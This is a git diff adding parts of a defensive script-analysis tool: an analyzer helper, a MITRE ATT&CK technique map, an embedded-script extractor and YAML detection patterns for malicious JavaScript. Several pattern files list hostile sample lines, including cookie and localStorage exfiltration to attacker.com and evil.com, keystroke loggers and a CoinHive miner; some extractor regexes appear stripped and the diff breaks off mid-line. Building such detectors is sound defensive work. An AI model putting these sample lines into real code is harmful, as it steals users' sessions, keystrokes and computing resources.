+ + Returns: + Dictionary mapping tactic names to technique counts. + """ + tactic_counts = {} + for technique in mitre_techniques.values(): + tactic = technique.tactic + tactic_counts[tactic] = tactic_counts.get(tactic, 0) + 1 + return tactic_counts + + def get_statistics(self) -> Dict[str, Any]: + """ + Returns statistics about the analyzer. + + Returns: + Dictionary with analyzer statistics. + """ + stats = { + 'patterns_loaded': self.patterns_loaded, + 'heuristic_engine': self.heuristic_engine.get_statistics() + } + return stats + + +# Convenience function for one-off analysis +def analyze_script( + script_content: str, + language: str, + patterns_dir: Optional[str | Path] = None +) -> tuple[Optional[AnalysisResult], Optional[str]]: + """ + Convenience function to analyze a script without managing analyzer instance. + + Creates a ScriptAnalyzer, loads patterns, and performs analysis. + For repeated use, create an analyzer instance and reuse it. + + Args: + script_content: The script content to analyze. + language: Script language ('powershell', 'bash', 'javascript'). + patterns_dir: Directory containing patterns (default: auto-detect). + + Returns: + Tuple of (AnalysisResult, error_message). + + Examples: + >>> result, error = analyze_script(script_content, 'powershell') + >>> if result: + ... 
print(f"Verdict: {result.verdict.value}") + """ + # Auto-detect patterns directory if not provided + if patterns_dir is None: + current_file = Path(__file__) + patterns_dir = current_file.parent / 'patterns' + + analyzer = ScriptAnalyzer(patterns_dir) + return analyzer.analyze(script_content, language) diff --git a/docker/script-sentinel/sentinel/data/mitre_attack.json b/docker/script-sentinel/sentinel/data/mitre_attack.json new file mode 100644 index 0000000000000..eab40d1a79c10 --- /dev/null +++ b/docker/script-sentinel/sentinel/data/mitre_attack.json @@ -0,0 +1,150 @@ +{ + "name": "Enterprise ATT&CK", + "version": "14.1", + "techniques": { + "T1059": { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "tactic": [ + "Execution" + ], + "description": "Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.", + "url": "https://attack.mitre.org/techniques/T1059/" + }, + "T1059.001": { + "id": "T1059.001", + "name": "PowerShell", + "tactic": [ + "Execution" + ], + "description": "Adversaries may abuse PowerShell commands and scripts for execution.", + "url": "https://attack.mitre.org/techniques/T1059/001/", + "parent": "T1059" + }, + "T1059.004": { + "id": "T1059.004", + "name": "Unix Shell", + "tactic": [ + "Execution" + ], + "description": "Adversaries may abuse Unix shell commands and scripts for execution.", + "url": "https://attack.mitre.org/techniques/T1059/004/", + "parent": "T1059" + }, + "T1140": { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis.", + "url": "https://attack.mitre.org/techniques/T1140/" + }, + "T1027": { + "id": "T1027", + "name": "Obfuscated Files or Information", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze.", + 
"url": "https://attack.mitre.org/techniques/T1027/" + }, + "T1071": { + "id": "T1071", + "name": "Application Layer Protocol", + "tactic": [ + "Command and Control" + ], + "description": "Adversaries may communicate using application layer protocols to avoid detection.", + "url": "https://attack.mitre.org/techniques/T1071/" + }, + "T1071.001": { + "id": "T1071.001", + "name": "Web Protocols", + "tactic": [ + "Command and Control" + ], + "description": "Adversaries may communicate using application layer protocols associated with web traffic.", + "url": "https://attack.mitre.org/techniques/T1071/001/", + "parent": "T1071" + }, + "T1105": { + "id": "T1105", + "name": "Ingress Tool Transfer", + "tactic": [ + "Command and Control" + ], + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment.", + "url": "https://attack.mitre.org/techniques/T1105/" + }, + "T1003": { + "id": "T1003", + "name": "OS Credential Dumping", + "tactic": [ + "Credential Access" + ], + "description": "Adversaries may attempt to dump credentials to obtain account login and credential material.", + "url": "https://attack.mitre.org/techniques/T1003/" + }, + "T1003.001": { + "id": "T1003.001", + "name": "LSASS Memory", + "tactic": [ + "Credential Access" + ], + "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).", + "url": "https://attack.mitre.org/techniques/T1003/001/", + "parent": "T1003" + }, + "T1055": { + "id": "T1055", + "name": "Process Injection", + "tactic": [ + "Defense Evasion", + "Privilege Escalation" + ], + "description": "Adversaries may inject code into processes in order to evade process-based defenses.", + "url": "https://attack.mitre.org/techniques/T1055/" + }, + "T1547": { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "tactic": [ + "Persistence", + "Privilege Escalation" + ], + "description": 
"Adversaries may configure system settings to automatically execute a program during system boot or logon.", + "url": "https://attack.mitre.org/techniques/T1547/" + }, + "T1547.001": { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "tactic": [ + "Persistence", + "Privilege Escalation" + ], + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.", + "url": "https://attack.mitre.org/techniques/T1547/001/", + "parent": "T1547" + }, + "T1562": { + "id": "T1562", + "name": "Impair Defenses", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.", + "url": "https://attack.mitre.org/techniques/T1562/" + }, + "T1562.001": { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "tactic": [ + "Defense Evasion" + ], + "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.", + "url": "https://attack.mitre.org/techniques/T1562/001/", + "parent": "T1562" + } + } +} \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/extractor.py b/docker/script-sentinel/sentinel/extractor.py new file mode 100644 index 0000000000000..1667d1f6f9d7b --- /dev/null +++ b/docker/script-sentinel/sentinel/extractor.py @@ -0,0 +1,438 @@ +# sentinel/extractor.py + +""" +Script extraction module for embedded scripts in HTML, XML, and SCT files. + +This module detects and extracts scripts embedded in various container formats, +enabling analysis of scripts within HTML pages, XML configurations, and SCT files. +""" + +import re +import logging +from typing import List, Tuple, Optional +from dataclasses import dataclass + +logger = logging.getLogger(__name__) + + +@dataclass +class ExtractedScript: + """ + Represents a script extracted from a container file. 
+ + Attributes: + content: The extracted script content. + language: Detected language ('javascript', 'powershell', 'bash', 'jscript'). + line_start: Starting line number in the original file. + line_end: Ending line number in the original file. + source_type: Type of container ('html', 'xml', 'sct'). + context: Additional context about the extraction (e.g., tag name). + """ + content: str + language: str + line_start: int + line_end: int + source_type: str + context: str = "" + + +class ScriptExtractor: + """ + Extracts embedded scripts from HTML, XML, and SCT files. + + Supports: + - HTML: ', + re.DOTALL | re.IGNORECASE + ) + + # Pattern for CDATA sections + self.cdata_pattern = re.compile( + r'', + re.DOTALL + ) + + # Pattern for SCT script tags with language attribute + self.sct_script_pattern = re.compile( + r']*>(.*?)', + re.DOTALL | re.IGNORECASE + ) + + # Pattern for XML script tags with type attribute + self.xml_script_pattern = re.compile( + r']*>(.*?)', + re.DOTALL | re.IGNORECASE + ) + + def detect_file_type(self, content: str) -> Optional[str]: + """ + Detect the file type based on content. + + Args: + content: File content to analyze. + + Returns: + File type ('html', 'xml', 'sct') or None if unknown. 
+ """ + content_lower = content.lower().strip() + + # Check for SCT (scriptlet) files + if ' List[ExtractedScript]: + """ + Extract JavaScript from HTML '" + - "document.write('')" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml new file mode 100644 index 0000000000000..e41ab9e8b4759 --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml @@ -0,0 +1,32 @@ +# JavaScript Pattern: Code Obfuscation +# Detects common JavaScript obfuscation patterns + +id: JS-003 +name: Obfuscated Code Detection +description: | + Detects common JavaScript obfuscation patterns including excessive use of + escape sequences, hex encoding, unicode escapes, and string concatenation + with array indexing. These techniques are frequently used to hide malicious + code from static analysis tools. +languages: + - javascript +detection_type: regex +detection_logic: '(?:\\x[0-9a-fA-F]{2}.*){5,}|(?:\\u[0-9a-fA-F]{4}.*){5,}|(?:\[\d+\]\s*\+\s*){3,}' +severity: Medium +mitre_technique: T1027 +confidence: 0.75 +category: obfuscation +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-01-15" + references: + - "https://attack.mitre.org/techniques/T1027/" + tags: + - javascript + - obfuscation + - encoding + examples: + - "var x = '\\x61\\x6c\\x65\\x72\\x74\\x28\\x31\\x29'" + - "eval('\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029')" + - "var s = arr[0] + arr[1] + arr[2] + arr[3] + arr[4]" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml new file mode 100644 index 0000000000000..86676ae7dc54e --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml @@ -0,0 +1,35 @@ +# JavaScript 
Pattern: Function Constructor Usage +# Detects use of Function constructor for code execution + +id: JS-004 +name: Function Constructor Code Execution +description: | + Detects use of the Function constructor to create and execute dynamic code. + Similar to eval(), the Function constructor can execute arbitrary JavaScript + from strings, making it a vector for code injection attacks. Attackers use + this to bypass static analysis and execute malicious code. +languages: + - javascript +detection_type: regex +detection_logic: '\bnew\s+Function\s*\(|Function\s*\(\s*["\x27]' +severity: High +mitre_technique: T1059.007 +confidence: 0.85 +category: command_injection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1059/007/" + - "https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function" + tags: + - javascript + - code-execution + - function-constructor + - injection + examples: + - "var fn = new Function('return ' + userInput); fn();" + - "const execute = Function('a', 'b', 'return a + b');" + - "(new Function(maliciousCode))()" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml new file mode 100644 index 0000000000000..61b1edf3587aa --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: document.write() XSS Vector +# Detects use of document.write() with user input + +id: JS-005 +name: document.write() XSS Vector +description: | + Detects use of document.write() which can be exploited for Cross-Site Scripting + (XSS) attacks when used with untrusted input. This method directly writes HTML + to the document and can execute scripts if user-controlled data is included. 
+ Modern security best practices discourage its use. +languages: + - javascript +detection_type: regex +detection_logic: '\bdocument\.write(?:ln)?\s*\(' +severity: Medium +mitre_technique: T1059.007 +confidence: 0.7 +category: injection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1059/007/" + - "https://developer.mozilla.org/en-US/docs/Web/API/Document/write" + tags: + - javascript + - xss + - document-write + - injection + examples: + - "document.write('');" + - "document.writeln(untrustedData);" + - "document.write('');" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml new file mode 100644 index 0000000000000..3a9cc1697080f --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: innerHTML Assignment XSS +# Detects innerHTML assignments that may lead to XSS + +id: JS-006 +name: innerHTML Assignment XSS Risk +description: | + Detects direct assignment to innerHTML property which can lead to Cross-Site + Scripting vulnerabilities when used with untrusted data. Unlike textContent, + innerHTML parses and executes HTML/JavaScript, making it dangerous with + user-controlled input. Attackers exploit this to inject malicious scripts. 
+languages: + - javascript +detection_type: regex +detection_logic: '\.innerHTML\s*=|\.outerHTML\s*=' +severity: Low +mitre_technique: T1059.007 +confidence: 0.5 +category: injection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1059/007/" + - "https://developer.mozilla.org/en-US/docs/Web/API/Element/innerHTML" + tags: + - javascript + - xss + - innerhtml + - dom-manipulation + examples: + - "element.innerHTML = userInput;" + - "div.innerHTML = '';" + - "document.getElementById('content').outerHTML = maliciousHTML;" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml new file mode 100644 index 0000000000000..7eb9669c38edf --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: WebSocket Data Exfiltration +# Detects WebSocket usage for potential data exfiltration + +id: JS-007 +name: WebSocket Data Exfiltration +description: | + Detects WebSocket connections that may be used for data exfiltration or + command and control communication. While WebSockets are legitimate, attackers + abuse them to bypass traditional HTTP monitoring and exfiltrate data in + real-time. This pattern identifies WebSocket instantiation and send operations. 
+languages: + - javascript +detection_type: regex +detection_logic: '\bnew\s+WebSocket\s*\(|\.send\s*\(.*(?:document\.|localStorage|sessionStorage|cookie)' +severity: Medium +mitre_technique: T1041 +confidence: 0.7 +category: exfiltration +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1041/" + - "https://developer.mozilla.org/en-US/docs/Web/API/WebSocket" + tags: + - javascript + - websocket + - exfiltration + - c2 + examples: + - "var ws = new WebSocket('wss://attacker.com'); ws.send(document.cookie);" + - "socket.send(JSON.stringify(localStorage));" + - "const ws = new WebSocket('ws://evil.com:8080'); ws.send(sensitiveData);" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml new file mode 100644 index 0000000000000..f01cb62a858d8 --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: Cryptocurrency Mining +# Detects cryptocurrency mining scripts + +id: JS-008 +name: Cryptocurrency Mining Detection +description: | + Detects JavaScript cryptocurrency mining code (cryptojacking). Attackers inject + mining scripts into compromised websites to use visitors' CPU resources for + mining cryptocurrency. This pattern identifies common mining libraries like + CoinHive, Coinhive alternatives, and WebAssembly-based miners. 
+languages: + - javascript +detection_type: regex +detection_logic: '(?i)(?:coinhive|cryptonight|monero|CoinHive\.Anonymous|new\s+Miner\(|\.start\(\).*miner|authedmine|crypto-loot|webminerpool|(?:new\s+)?Worker.*(?:WebSocket|wss:)|pool.*wss:|mining.*(?:WebSocket|Worker))' +severity: High +mitre_technique: T1496 +confidence: 0.85 +category: impact +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1496/" + - "https://www.malwarebytes.com/cryptojacking" + tags: + - javascript + - cryptomining + - cryptojacking + - resource-hijacking + examples: + - "var miner = new CoinHive.Anonymous('site-key'); miner.start();" + - "new Miner('monero-wallet-address', {throttle: 0.2}).start();" + - "CoinHive.CONFIG.WEBSOCKET_SHARDS = [['wss://ws001.coinhive.com/proxy']];" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml new file mode 100644 index 0000000000000..39387bf316818 --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: Keylogger Detection +# Detects keylogging functionality + +id: JS-009 +name: Keylogger Detection +description: | + Detects JavaScript keylogger implementations that capture user keystrokes. + Attackers use keyloggers to steal passwords, credit card numbers, and other + sensitive information entered by users. This pattern identifies event listeners + for keyboard events combined with data collection or transmission. 
+languages: + - javascript +detection_type: regex +detection_logic: '(?:addEventListener\s*\(\s*["\x27]key(?:down|up|press)|onkey(?:down|up|press)\s*=).*(?:\.key|\.keyCode|\.which)' +severity: High +mitre_technique: T1056.001 +confidence: 0.8 +category: collection +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1056/001/" + - "https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent" + tags: + - javascript + - keylogger + - credential-theft + - input-capture + examples: + - "document.addEventListener('keydown', function(e) { sendToServer(e.key); });" + - "window.onkeypress = function(e) { log += e.key; };" + - "document.onkeydown = (e) => { fetch('/log?key=' + e.keyCode); };" \ No newline at end of file diff --git a/docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml b/docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml new file mode 100644 index 0000000000000..daaed698eb16c --- /dev/null +++ b/docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml @@ -0,0 +1,35 @@ +# JavaScript Pattern: localStorage/sessionStorage Theft +# Detects theft of browser storage data + +id: JS-010 +name: Browser Storage Data Theft +description: | + Detects attempts to access and exfiltrate data from localStorage or sessionStorage. + Attackers target browser storage to steal authentication tokens, session data, + and other sensitive information. This pattern identifies bulk storage access + combined with network transmission or suspicious iteration patterns. 
+languages: + - javascript +detection_type: regex +detection_logic: '(?:localStorage|sessionStorage)(?:\.getItem|\.key\(|\[).*(?:fetch|XMLHttpRequest|\.send\(|navigator\.sendBeacon)' +severity: Medium +mitre_technique: T1539 +confidence: 0.75 +category: credential_access +enabled: true +metadata: + author: Script Sentinel Team + created: "2025-11-17" + updated: "2025-11-17" + references: + - "https://attack.mitre.org/techniques/T1539/" + - "https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage" + tags: + - javascript + - localstorage + - data-theft + - session-hijacking + examples: + - "fetch('http://attacker.com/collect', {method: 'POST', body: JSON.stringify(localStorage)});" + - "for(let i=0; i